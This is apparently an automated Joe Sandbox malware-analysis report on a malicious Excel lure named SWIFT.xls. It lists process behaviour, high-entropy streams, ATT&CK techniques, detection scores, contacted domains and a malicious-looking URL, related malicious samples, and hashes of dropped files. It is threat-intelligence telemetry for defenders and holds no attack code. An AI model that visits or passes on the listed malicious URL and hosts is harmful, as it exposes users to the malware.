Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: SWIFT.xlsStream path 'MBD006D439E/MBD006D2A09/MBD00049180/CONTENTS' entropy: 7.9671168067 (max. 8.0)
Source: SWIFT.xlsStream path 'MBD006D439E/MBD006D2A09/Workbook' entropy: 7.98367556288 (max. 8.0)
Source: SWIFT.xlsStream path 'Workbook' entropy: 7.99809337537 (max. 8.0)
Source: 6E440000.0.drStream path 'MBD006D439E/MBD006D2A09/MBD00049180/CONTENTS' entropy: 7.9671168067 (max. 8.0)
Source: 6E440000.0.drStream path 'MBD006D439E/MBD006D2A09/Workbook' entropy: 7.98367556288 (max. 8.0)
Source: 6E440000.0.drStream path 'Workbook' entropy: 7.99829492284 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 741Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts13
Exploitation for Client Execution
1
DLL Side-Loading
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Virtualization/Sandbox Evasion
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Process Injection
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Extra Window Memory Injection
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
SWIFT.xls25%VirustotalBrowse
SWIFT.xls26%ReversingLabsDocument-PDF.Trojan.Heuristic
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    s.deemos.com
    14.103.79.10
    truefalse
      unknown
      s-part-0035.t-0009.t-msedge.net
      13.107.246.63
      truefalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://s.deemos.com/lqSa1Aoh?&linen=frightened&trumpetfalse
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://s.deemos.com/lqSa1Aoh?&linen=friSWIFT.xls, 6E440000.0.drfalse
            unknown
            http://www.wowform.comSWIFT.xls, B833F2D7.emf.0.dr, 1DA485C4.emf.0.dr, 6AB36EAE.emf.0.dr, 96874680.emf.11.dr, 52C65A13.emf.0.dr, 477FA321.emf.0.dr, C1710E42.emf.0.dr, 6E440000.0.dr, 5691B099.emf.0.drfalse
              high
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              14.103.79.10
              s.deemos.comChina
              18002WORLDPHONE-INASNumberforInterdomainRoutingINfalse
              57.129.55.225
              unknownBelgium
              2686ATGS-MMD-ASUSfalse
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1578835
              Start date and time:2024-12-20 15:20:07 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 5m 21s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:13
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:SWIFT.xls
              Detection:MAL
              Classification:mal76.expl.winXLS@8/31@1/2
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .xls
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Attach to Office via COM
              • Active ActiveX Object
              • Active ActiveX Object
              • Scroll down
              • Close Viewer
              • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, svchost.exe, MavInject32.exe
              • Excluded IPs from analysis (whitelisted): 52.109.28.46, 92.122.16.236, 52.113.194.132, 52.109.89.19, 199.232.214.172, 104.208.16.89, 184.28.90.27, 52.168.112.67, 20.190.181.4, 20.109.210.53, 13.107.246.63
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, weu-azsc-000.roaming.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, ocsp.digicert.com, login.live.com, onedscolprdcus11.centralus.cloudapp.azure.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, onedsco
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              TimeTypeDescription
              09:22:05API Interceptor781x Sleep call for process: splwow64.exe modified
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              s-part-0035.t-0009.t-msedge.netInvoice for 04-09-24 fede39.admr.org.htmlGet hashmaliciousUnknownBrowse
              • 13.107.246.63
              https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2FpaymentGet hashmaliciousHTMLPhisherBrowse
              • 13.107.246.63
              ktyihkdfesf.exeGet hashmaliciousVidarBrowse
              • 13.107.246.63
              pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
              • 13.107.246.63
              Laurier Partners Proposal.emlGet hashmaliciousHTMLPhisherBrowse
              • 13.107.246.63
              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
              • 13.107.246.63
              https://drive.google.com/file/d/1zySfUjQ3GqIVAlBHIX3CXdgIcWIqrMkO/view?usp=sharing_eil&ts=67645d30Get hashmaliciousUnknownBrowse
              • 13.107.246.63
              1734647107dd7eab79078510a75c9c904ec20f028e4e5eeaf98868f69fdfb304d2c24675ce436.dat-decoded.exeGet hashmaliciousXWormBrowse
              • 13.107.246.63
              17346471071098118b26fa2e7fe54471af2f31e15cc65aad0de660d0190f83c19fa638201a790.dat-decoded.exeGet hashmaliciousNjratBrowse
              • 13.107.246.63
              1734647107a511924ae4323dadec335a6dd4daac1533c80e42a10385a9bac8294ee73069f5190.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
              • 13.107.246.63
              bg.microsoft.map.fastly.nettmp.zipGet hashmaliciousUnknownBrowse
              • 199.232.210.172
              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
              • 199.232.210.172
              https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2FpaymentGet hashmaliciousHTMLPhisherBrowse
              • 199.232.214.172
              Dec 2024_12192924_Image.pdfGet hashmaliciousHTMLPhisherBrowse
              • 199.232.214.172
              invoice.docmGet hashmaliciousUnknownBrowse
              • 199.232.214.172
              bad.txtGet hashmaliciousAsyncRATBrowse
              • 199.232.214.172
              ep_setup.exeGet hashmaliciousUnknownBrowse
              • 199.232.214.172
              2JSGOlbNym.dllGet hashmaliciousUnknownBrowse
              • 199.232.214.172
              4hSuRTwnWJ.dllGet hashmaliciousUnknownBrowse
              • 199.232.214.172
              I3FtIOCni3.dllGet hashmaliciousGhostRatBrowse
              • 199.232.214.172
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              WORLDPHONE-INASNumberforInterdomainRoutingINOwari.arm.elfGet hashmaliciousUnknownBrowse
              • 14.103.40.223
              ZEjcJZcrXc.elfGet hashmaliciousMiraiBrowse
              • 114.69.243.134
              SecuriteInfo.com.Linux.Siggen.9999.14080.25460.elfGet hashmaliciousMiraiBrowse
              • 14.103.40.233
              3b4m3C11Vd.elfGet hashmaliciousMiraiBrowse
              • 14.103.92.59
              HTUyCRuDev.elfGet hashmaliciousUnknownBrowse
              • 114.69.243.149
              XoQ5jUCXz6.elfGet hashmaliciousMiraiBrowse
              • 14.103.40.218
              x86_32.elfGet hashmaliciousMiraiBrowse
              • 114.69.243.142
              qD1LXlBAL2.elfGet hashmaliciousMiraiBrowse
              • 14.103.40.250
              uVpRlUULE0.elfGet hashmaliciousMiraiBrowse
              • 114.69.243.138
              mEMZ7TZ7CE.elfGet hashmaliciousUnknownBrowse
              • 14.102.85.180
              ATGS-MMD-ASUSarm7.elfGet hashmaliciousMiraiBrowse
              • 57.50.158.22
              nsharm.elfGet hashmaliciousMiraiBrowse
              • 33.241.131.44
              la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
              • 56.198.189.231
              la.bot.arm.elfGet hashmaliciousMiraiBrowse
              • 57.146.109.82
              la.bot.sparc.elfGet hashmaliciousMiraiBrowse
              • 33.211.47.171
              la.bot.m68k.elfGet hashmaliciousMiraiBrowse
              • 33.172.49.9
              la.bot.sh4.elfGet hashmaliciousMiraiBrowse
              • 48.171.43.225
              la.bot.mips.elfGet hashmaliciousMiraiBrowse
              • 50.15.59.79
              https://ryouthed.com/click.php?key=ij553tkpbj8t1lsuduh3&SUB_ID_SHORT=47f1db28f063a1d38918a2dcc31e91eb&COST_CPC=0.000050&PLACEMENT_ID=25101964&CAMPAIGN_ID=1170410&PUBLISHER_ID=2361353&ZONE_ID=4463547Get hashmaliciousUnknownBrowse
              • 34.49.73.131
              la.bot.arm6.elfGet hashmaliciousMiraiBrowse
              • 57.234.154.183
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              6271f898ce5be7dd52b0fc260d0662b3QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
              • 14.103.79.10
              https://registry.paratext.orgGet hashmaliciousUnknownBrowse
              • 14.103.79.10
              Payment_Failure_Notice_Office365_sdf_[13019].htmlGet hashmaliciousHTMLPhisherBrowse
              • 14.103.79.10
              R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
              • 14.103.79.10
              https://launch.app/plainsartGet hashmaliciousHTMLPhisherBrowse
              • 14.103.79.10
              Order_948575494759.xlsGet hashmaliciousUnknownBrowse
              • 14.103.79.10
              Order_948575494759.xlsGet hashmaliciousUnknownBrowse
              • 14.103.79.10
              YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
              • 14.103.79.10
              https://ce4.ajax.a8b.co/get?redir=1&id=d4vCW7zizPl1mo0GYx0ELgo+CCIybH9/c4qC7CeWEuI=&uri=//the-western-fire-chiefs-association.jimdosite.comGet hashmaliciousUnknownBrowse
              • 14.103.79.10
              IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
              • 14.103.79.10
              No context
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):118
              Entropy (8bit):3.5700810731231707
              Encrypted:false
              SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
              MD5:573220372DA4ED487441611079B623CD
              SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
              SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
              SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
              Malicious:false
              Reputation:high, very likely benign file
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
              Category:dropped
              Size (bytes):4761
              Entropy (8bit):7.945585251880973
              Encrypted:false
              SSDEEP:96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
              MD5:77B20B5CD41BC6BB475CCA3F91AE6E3C
              SHA1:9E98ACE72BD2AB931341427A856EF4CEA6FAF806
              SHA-256:5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
              SHA-512:3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:MSCF............,...................O..................YWP .disallowedcert.stl.lJ..B...CK.wTS.....{.&Uz.I."E".HS@. .P.!.....*E. .DQ..... EDA.H. E..""/.s<.s.9.....&#.{~k.VV..7@......b.R....MdT..B.L..%.C......" ....%.4%..%*.B..T.d...S.....pem..$....&.q.`.+...E..C.....$.|.A.!~d.H>w%S$...QC't..;..<..R@....2. .l..?..c..A....Ew...l..K$.. ~...'......Mt^c..s.Y%..}......h......m....h.......~d...,...=ge3.....2%..(...T..!].....!C~.X..MHU.o[.z].Y...&lXG;uW.:...2!..][\/.G..]6#.I...S..#F.X.k.j.....)Nc.].t^.-l.Y...4?.b...rY....A......7.D.H\.R...s.L,.6.*|.....VQ....<.*.......... [Z....].N0LU.X........6..C\....F.....KbZ..^=.@.B..MyH...%.2.>...]..E.....sZ.f..3z.].Y.t.d$.....P...,. .~..mNZ[PL.<....d..+...l.-...b.^....6F..z.&.;D.._..c."...d..... k9....60?&..Y.v.dgu...{.....{..d=..$......@^..qA..*uJ..@W.V..eC..AV.e+21...N.{.]..]..f]..`Z.....]2.....x..f..K...t. ...e.V.U.$PV..@6W\_nsm.n.........A<.......d....@f..Z... >R..k.....8..Y....E>..2o7..........c..K7n....
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):340
              Entropy (8bit):3.247043943455265
              Encrypted:false
              SSDEEP:6:kKDULlU5+7DNfUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:7krLkPlE99SCQl2DUeXJlOA
              MD5:C872E3EA608C9ED1F067C794587F06DF
              SHA1:B46607ABC429167A19ECEF1C5D6C41BA73FC3309
              SHA-256:E46F74C232C166D948AB42BA4BC0571C17B9029FDB1056E05D834D1CF0A44800
              SHA-512:6693E87B1AD2B0F5AE469DDB406D9FAB49E7D62535390B53FE22139A7E7F1560C2D771D643AEBEC9B772879D9FC750EFB591E410CBA28CC5E587DF5B839C8996
              Malicious:false
              Preview:p...... ........+..i.R..(....................................................... ........~..MG......&.....6.........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...
              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
              File Type:data
              Category:dropped
              Size (bytes):227002
              Entropy (8bit):3.392780893644728
              Encrypted:false
              SSDEEP:1536:WKPC4iyzDtrh1cK3XEivK7VK/3AYvYwgF/rRoL+sn:DPCaJ/3AYvYwglFoL+sn
              MD5:87EDBEE38F56C20298F25D5D3D4D1B5C
              SHA1:7F904E9615AC3186A87472EF366DD8202855B0B7
              SHA-256:A46B56D3ABCC137D1872DDF20EED4BCD7D04518282282ADB32DDCCF70D7FFBA6
              SHA-512:BBEBC1FCD5BC9AE042DD5782425BA8C47BF3EAC283B2487FC4E3FF6BF8101306DAB081E5135594165D4DC1AC120FF125AADBC5B3FFE7C646183C04DF77865E0D
              Malicious:false
              Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):934
              Entropy (8bit):2.7129194926077287
              Encrypted:false
              SSDEEP:24:YIrNvpCHhFGMfzLRwcftR/8AJp9WtAZRJ5poIHWPZqy:YmbCHaMfzLmcL8AJtfJ52IH2Zh
              MD5:AEA8676011F651E962233964C56EC078
              SHA1:48A16B5ED64B901BD474918730E8428101BCB382
              SHA-256:F66BFE3FB3CF9C5973527B3C6ED0927D4056DADF962D0B64B87FD97F852191F9
              SHA-512:76ED966584166233A500D2400C012929DC76D1DFF397C3A3D014FB7ECE767730966655974A3B1BE5B6E0C03CC21B3A38B3029916628DCC07D07CC1A8F7031748
              Malicious:false
              Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.3.7.4.6.2.5.9.,.1.2.2.3.4.3.4.,.3.7.4.6.2.6.5.,.3.7.4.6.2.5.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.8.7.4.7.0.1.5.3.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.3.7.4.6.3.7.9.,.1.9.8.4.4.3.5.,.6.1.7.0.7.3.0.5.,.3.1.4.1.5.9.2.0.,.
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):2366784
              Entropy (8bit):2.5702042031546672
